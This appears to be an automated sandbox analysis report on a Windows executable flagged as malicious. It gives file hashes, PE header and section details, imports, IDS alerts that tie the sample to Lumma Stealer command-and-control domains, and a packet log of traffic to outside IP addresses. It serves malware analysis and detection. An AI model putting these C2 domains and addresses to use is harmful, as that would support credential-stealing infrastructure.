SHA-512:	A0EAE14B5AA2800F2D4E92E6735A9B3ACF6256C9DFD811DD5E9E16DF20B7DCB7911FA112AE0344A3D3DDF95A4610FBCDC729CD0F9746ED006E277D4E103482FF
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Joe Sandbox View:	Filename: g3toRYa6JE.exe, Detection: malicious, Browse Filename: lBb4XI4eGD.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................................................Rich...........PE..L......f.................6...p...............P....@..........................................................................i..(........i...........................................................................P...............................text....4.......6.................. ..`.rdata..V"...P...$...:..............@..@.data....\|...........^..............@....nosu....S.......H...t..............@....muwav..Z....`......................@....roxah.......p......................@..@.rsrc....i.......j..................@..@........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\89AC.tmp.exe

Download File

Process:	C:\Users\user\Desktop\NDWffRLk7z.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	403968
Entropy (8bit):	6.686761413395804
Encrypted:	false
SSDEEP:	3072:Ro2KKJ9Uzzp69NgvCbewaeDZwq0K4gowWix4WlhBTSPY89CA2dPtcDB66Ngv73mt:VJQ6rEGEPipJSPincDcMm28I
MD5:	08494E6A1E788EA3259955A4524FDFEC
SHA1:	2C8FA17D05251B515CC52694335A88C7A609E303
SHA-256:	9EEE9D46E5EA0B25BD904760A998A54550AB3800666D01E27AA8FF52626ECE94
SHA-512:	A0EAE14B5AA2800F2D4E92E6735A9B3ACF6256C9DFD811DD5E9E16DF20B7DCB7911FA112AE0344A3D3DDF95A4610FBCDC729CD0F9746ED006E277D4E103482FF
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Joe Sandbox View:	Filename: g3toRYa6JE.exe, Detection: malicious, Browse Filename: lBb4XI4eGD.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................................................Rich...........PE..L......f.................6...p...............P....@..........................................................................i..(........i...........................................................................P...............................text....4.......6.................. ..`.rdata..V"...P...$...:..............@..@.data....\|...........^..............@....nosu....S.......H...t..............@....muwav..Z....`......................@....roxah.......p......................@..@.rsrc....i.......j..................@..@........................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.29876754825404
Encrypted:	false
SSDEEP:	6144:OECqOEmWfd+WQFHy/9026ZTyaRsCDusBqD5dooi8lkSD6VJSR0l:jCsL6seqD5SxSWVARy
MD5:	61AAB20ED513764B184174F3D6475D0A
SHA1:	44B8044C681EE7C411DE557AB8F221A5A1577799
SHA-256:	EE33D1A38CFF700948291F9FF24869188763D9F43230D54251B15C1E07001B8A
SHA-512:	511818EE9E82DC4F73EAAAE9E884078C1A17193B426A6A3903FDC211C5D7CB50652D7C7FF54677CB52BD377C743BA15F27A83F7BCAA2D935D6E508481AEE9111
Malicious:	false
Preview:	regfD...D....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm^.N..e...............................................................................................................................................................................................................................................................................................................................................xZ.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.890394194265527
TrID:	Win32 Executable (generic) a (10002005/4) 99.53% InstallShield setup (43055/19) 0.43% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	NDWffRLk7z.exe
File size:	468'480 bytes
MD5:	9f08d109672d30fdd700843d3518d0e4
SHA1:	c5466728ead0dcab899503b5ace7b205b26315bd
SHA256:	f92fa8e4adeea867c8fd03a3951faad0c272adcf752646ecd6c80d41f66f34d8
SHA512:	631e694a15069fa98979fff8e66d22058c7640a674927e2386e674be8c62b4a59a1c65906ec1b51d7202c5201265739d5271a595058ab84cf446915aac65cd63
SSDEEP:	6144:Fr9JzxLAXduZCjLZ9O188Vv95qQfh9q5jk3DHpfHbGL5nWPQmzlpsG2Z:F9JzxSgZkPo8S9IV23LRuWxmG2
TLSH:	43A4AE0266EDE9D5EFB74B31AE3AC6E46A6FBC664E34625D31543B1F05323A1C462303
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........q4...g...g...g...g...g...g...g...g...g.Udg...g...g...g...g...g...g...g...g...gRich...g........................PE..L......e...

File Icon


Icon Hash:	86c7c30b0f4e0d19

Static PE Info

General

Entrypoint:	0x401534
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x65F6A686 [Sun Mar 17 08:15:02 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	90fb5ca8a4bfc73ddec5a22e9cf068f8

Entrypoint Preview

Instruction
call 00007F4524D61C75h
jmp 00007F4524D5E30Dh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [00456598h], eax
mov dword ptr [00456594h], ecx
mov dword ptr [00456590h], edx
mov dword ptr [0045658Ch], ebx
mov dword ptr [00456588h], esi
mov dword ptr [00456584h], edi
mov word ptr [004565B0h], ss
mov word ptr [004565A4h], cs
mov word ptr [00456580h], ds
mov word ptr [0045657Ch], es
mov word ptr [00456578h], fs
mov word ptr [00456574h], gs
pushfd
pop dword ptr [004565A8h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0045659Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [004565A0h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [004565ACh], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [004564E8h], 00010001h
mov eax, dword ptr [004565A0h]
mov dword ptr [0045649Ch], eax
mov dword ptr [00456490h], C0000409h
mov dword ptr [00456494h], 00000001h
mov eax, dword ptr [00455004h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [00455008h]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000A0h]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x539ec	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc5000	0x19750	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x53570	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x52000	0x18c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5030c	0x50400	24adbed1566f61fc5621bf6a60324f5b	False	0.843418394665109	data	7.542844670244443	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x52000	0x22cc	0x2400	b5b3d2008da72df5b5851507f2970bb0	False	0.3628472222222222	data	5.467548055344827	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x55000	0x67c08	0x1600	133623b9ce8d4552267997e7731dd3ba	False	0.2879971590909091	data	2.9089919343770316	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.loyuho	0xbd000	0x53e5	0x4800	f9debe3f07be68533bf0295e3d2ba68a	False	0.002224392361111111	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.cec	0xc3000	0x15a	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.yej	0xc4000	0xc	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0xc5000	0x19750	0x19800	07e3b0a25a7a5a80d088575963f1ad7d	False	0.42281326593137253	data	5.02805798167801	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_CURSOR	0xd5bb8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	0.31023454157782515
RT_CURSOR	0xd6a78	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0	0.7368421052631579
RT_CURSOR	0xd6ba8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.06130705394190871
RT_ICON	0xc5960	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	0.8171641791044776
RT_ICON	0xc6808	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	0.8262635379061372
RT_ICON	0xc70b0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	0.8018433179723502
RT_ICON	0xc7778	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	0.7933526011560693
RT_ICON	0xc7ce0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	0.8088174273858921
RT_ICON	0xca288	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	0.8426229508196721
RT_ICON	0xcac10	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	0.8581560283687943
RT_ICON	0xcb0e0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	0.3243603411513859
RT_ICON	0xcbf88	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.44765342960288806
RT_ICON	0xcc830	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	0.5190092165898618
RT_ICON	0xccef8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	0.536849710982659
RT_ICON	0xcd460	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.28822701688555347
RT_ICON	0xce508	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	0.289344262295082
RT_ICON	0xcee90	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.34131205673758863
RT_ICON	0xcf360	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	0.2785181236673774
RT_ICON	0xd0208	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.36462093862815886
RT_ICON	0xd0ab0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	0.3790322580645161
RT_ICON	0xd1178	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	0.36921965317919075
RT_ICON	0xd16e0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.2590248962655602
RT_ICON	0xd3c88	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.274624765478424
RT_ICON	0xd4d30	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	0.28647540983606556
RT_ICON	0xd56b8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.3262411347517731
RT_STRING	0xd9330	0x59a	data	0.4309623430962343
RT_STRING	0xd98d0	0xfc	data	0.5515873015873016
RT_STRING	0xd99d0	0x788	data	0.42012448132780084
RT_STRING	0xda158	0x784	data	0.4287941787941788
RT_STRING	0xda8e0	0x726	data	0.42568306010928963
RT_STRING	0xdb008	0x644	data	0.4389027431421446
RT_STRING	0xdb650	0x6bc	data	0.4274941995359629
RT_STRING	0xdbd10	0x7f2	data	0.41297935103244837
RT_STRING	0xdc508	0x786	data	0.4221183800623053
RT_STRING	0xdcc90	0x5ce	data	0.43943472409152085
RT_STRING	0xdd260	0x554	data	0.45234604105571846
RT_STRING	0xdd7b8	0x60c	data	0.4412144702842377
RT_STRING	0xdddc8	0x81c	data	0.41570327552986513
RT_STRING	0xde5e8	0x162	data	0.5169491525423728
RT_ACCELERATOR	0xd5b98	0x20	data	1.15625
RT_GROUP_CURSOR	0xd6a60	0x14	data	1.25
RT_GROUP_CURSOR	0xd9150	0x22	data	1.088235294117647
RT_GROUP_ICON	0xcb078	0x68	data	0.7115384615384616
RT_GROUP_ICON	0xd5b20	0x76	data	0.6779661016949152
RT_GROUP_ICON	0xcf2f8	0x68	data	0.7115384615384616
RT_VERSION	0xd9178	0x1b8	COM executable for DOS	0.575

Imports

DLL

Import

KERNEL32.dll

SearchPathW, SetThreadContext, DeleteTimerQueueEx, DebugActiveProcessStop, CreateProcessW, SetWaitableTimer, InterlockedDecrement, SetDefaultCommConfigW, GetEnvironmentStringsW, SetComputerNameW, GetProcessPriorityBoost, GetModuleHandleW, GetCurrentThread, GlobalAlloc, LoadLibraryW, GetVersionExW, GetTimeFormatW, GetConsoleAliasW, GetAtomNameW, GetVolumePathNameA, GetStartupInfoW, RaiseException, SetLastError, GetProcAddress, GetLongPathNameA, LoadLibraryA, InterlockedExchangeAdd, MoveFileA, AddAtomA, FoldStringA, OpenFileMappingW, GetFileTime, FindFirstVolumeA, FindAtomW, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, GetLastError, WriteFile, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, FlushFileBuffers, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, Sleep, ExitProcess, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, SetHandleCount, GetFileType, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, HeapCreate, VirtualFree, HeapFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, VirtualAlloc, HeapReAlloc, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, SetStdHandle, InitializeCriticalSectionAndSpinCount, RtlUnwind, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, CreateFileA, CloseHandle, HeapSize, GetModuleHandleA

USER32.dll

GetProcessDefaultLayout

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-12T17:47:05.148340+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49707	172.67.179.207	443	TCP
2025-01-12T17:47:05.960866+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49709	176.113.115.19	80	TCP
2025-01-12T17:47:09.096843+0100	2059088	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (skidjazzyric .click)	1	192.168.2.11	53943	1.1.1.1	53	UDP
2025-01-12T17:47:09.109909+0100	2059051	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soundtappysk .shop)	1	192.168.2.11	55202	1.1.1.1	53	UDP
2025-01-12T17:47:09.123270+0100	2059041	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (femalsabler .shop)	1	192.168.2.11	56412	1.1.1.1	53	UDP
2025-01-12T17:47:09.133793+0100	2059035	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (apporholis .shop)	1	192.168.2.11	57398	1.1.1.1	53	UDP
2025-01-12T17:47:09.147874+0100	2059039	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crowdwarek .shop)	1	192.168.2.11	62856	1.1.1.1	53	UDP
2025-01-12T17:47:09.158120+0100	2059057	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (versersleep .shop)	1	192.168.2.11	53151	1.1.1.1	53	UDP
2025-01-12T17:47:09.167609+0100	2059037	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chipdonkeruz .shop)	1	192.168.2.11	50434	1.1.1.1	53	UDP
2025-01-12T17:47:09.179427+0100	2059043	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (handscreamny .shop)	1	192.168.2.11	61343	1.1.1.1	53	UDP
2025-01-12T17:47:09.266467+0100	2059049	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (robinsharez .shop)	1	192.168.2.11	56135	1.1.1.1	53	UDP
2025-01-12T17:47:10.007203+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.11	49730	104.102.49.254	443	TCP
2025-01-12T17:47:10.488652+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.11	49730	104.102.49.254	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 12, 2025 17:47:04.247332096 CET	49707	443	192.168.2.11	172.67.179.207
Jan 12, 2025 17:47:04.247365952 CET	443	49707	172.67.179.207	192.168.2.11
Jan 12, 2025 17:47:04.247447968 CET	49707	443	192.168.2.11	172.67.179.207
Jan 12, 2025 17:47:04.259032011 CET	49707	443	192.168.2.11	172.67.179.207
Jan 12, 2025 17:47:04.259048939 CET	443	49707	172.67.179.207	192.168.2.11
Jan 12, 2025 17:47:04.730108023 CET	443	49707	172.67.179.207	192.168.2.11
Jan 12, 2025 17:47:04.730197906 CET	49707	443	192.168.2.11	172.67.179.207
Jan 12, 2025 17:47:04.798513889 CET	49707	443	192.168.2.11	172.67.179.207
Jan 12, 2025 17:47:04.798541069 CET	443	49707	172.67.179.207	192.168.2.11
Jan 12, 2025 17:47:04.798865080 CET	443	49707	172.67.179.207	192.168.2.11
Jan 12, 2025 17:47:04.798995018 CET	49707	443	192.168.2.11	172.67.179.207
Jan 12, 2025 17:47:04.814500093 CET	49707	443	192.168.2.11	172.67.179.207
Jan 12, 2025 17:47:04.855345964 CET	443	49707	172.67.179.207	192.168.2.11
Jan 12, 2025 17:47:05.148350000 CET	443	49707	172.67.179.207	192.168.2.11
Jan 12, 2025 17:47:05.148433924 CET	443	49707	172.67.179.207	192.168.2.11
Jan 12, 2025 17:47:05.150520086 CET	49707	443	192.168.2.11	172.67.179.207
Jan 12, 2025 17:47:05.150520086 CET	49707	443	192.168.2.11	172.67.179.207
Jan 12, 2025 17:47:05.151052952 CET	49707	443	192.168.2.11	172.67.179.207
Jan 12, 2025 17:47:05.151052952 CET	49707	443	192.168.2.11	172.67.179.207
Jan 12, 2025 17:47:05.151092052 CET	443	49707	172.67.179.207	192.168.2.11
Jan 12, 2025 17:47:05.152004957 CET	49707	443	192.168.2.11	172.67.179.207
Jan 12, 2025 17:47:05.270509958 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:05.275331974 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:05.275451899 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:05.275867939 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:05.280601025 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:05.960719109 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:05.960758924 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:05.960814953 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:05.960850000 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:05.960865974 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:05.960865974 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:05.960886002 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:05.960922003 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:05.960937977 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:05.960937977 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:05.960942984 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:05.960959911 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:05.960975885 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:05.960989952 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:05.961034060 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:05.961034060 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:05.966073036 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:05.966130972 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:05.966145039 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:05.966176033 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:05.966190100 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:05.966212988 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:05.966249943 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:05.966305971 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:05.966305971 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.082364082 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.082379103 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.082479000 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.082629919 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.082647085 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.082694054 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.082775116 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.082788944 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.082799911 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.082850933 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.082850933 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.082858086 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.082870960 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.083158016 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.083689928 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.083700895 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.083714008 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.083724022 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.083735943 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.083743095 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.083823919 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.084413052 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.084465027 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.084482908 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.084496021 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.084501982 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.084506035 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.084547997 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.084547997 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.085199118 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.085210085 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.085221052 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.085232019 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.085238934 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.085251093 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.085304022 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.085987091 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.086038113 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.087305069 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.087336063 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.087356091 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.087404966 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.205975056 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.206037045 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.206145048 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.206156969 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.206167936 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.206173897 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.206186056 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.206245899 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.206275940 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.206286907 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.206299067 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.206310034 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.206321001 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.206321001 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.206568003 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.206568003 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.206638098 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.206649065 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.206660986 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.206674099 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.206711054 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.206711054 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.206794977 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.206805944 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.206818104 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.206829071 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.206835032 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.206840038 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.206854105 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.206907988 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.206907988 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.206947088 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.207434893 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.207447052 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.207453012 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.207458019 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.207464933 CET	80	49709	176.113.115.19	192.168.2.11
